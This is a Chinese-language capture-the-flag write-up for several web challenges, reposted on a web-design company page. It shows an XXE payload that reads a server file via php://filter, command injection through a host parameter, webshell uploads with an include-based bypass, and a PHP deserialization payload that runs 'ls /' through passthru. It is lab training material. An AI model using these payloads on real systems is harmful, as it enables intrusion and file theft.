江门市网站建设_网站建设公司_H5网站_seo优化
2025/12/19 10:03:24 网站建设 项目流程

ExX?

根据题目,发现存在phpinfo,搜索发现flag

image

很遗憾,flag错误,是假的

没有什么思路,扫描网站目录,发现存在dom.php

image

查看提示,存在xxe漏洞

image

尝试构造利用,读取flag

payload:

<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php" >
]><root><username>&xxe;</username><password>root</password>
</root>

image

image

EZ_Host

查看题目提示,存在?host=YOUR_HOST可执行参数

image

构造命令执行语句

image

读取flag

image

传马

查看题目,上传一句话木马

image

连接获取webshell,使用命令行读取flag

image

笑傲上传

老规矩,上传文件测试

image

监测存在过滤(监测文件内容),尝试上传图片马绕过

image

发现无法连接,查看网站源代码发现include.php

image

尝试使用file参数读取上传一句话木马进行加载

image

image

连接获取flag

image

序列一下

查看题目,反序列化题目

image

构造payload

<?php
class Polar {public $url = 'polarctf.com';public $lt  = 'passthru';public $b   = 'ls /';
}
echo serialize(new Polar);
?>

image

获取flag

image

坏掉的上传页

查看题目,发现上传无法进行

image

找到config.php

image

访问查看,发现默认上传路径

image

构造上传脚本

image

可以正常上传,连接获取flag

image

xxmmll

image

抓包发现提示xxmmll.php

image

读取flag

image

根据报错提示,输入xml语句,成功回显flag

<?xml version="1.0" encoding="UTF-8"?>
<xxe><Message>123123</Message>
</xxe>

image

这个题目有偷鸡的方法,可以扫目录,能直接查看到flag

image

Note

根据提示,查看debug.log

image

没有任何思路,看提示应该是反序列,可以通过logs.txt查看提示,但是不太会

选择偷鸡,访问flag.txt

image

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询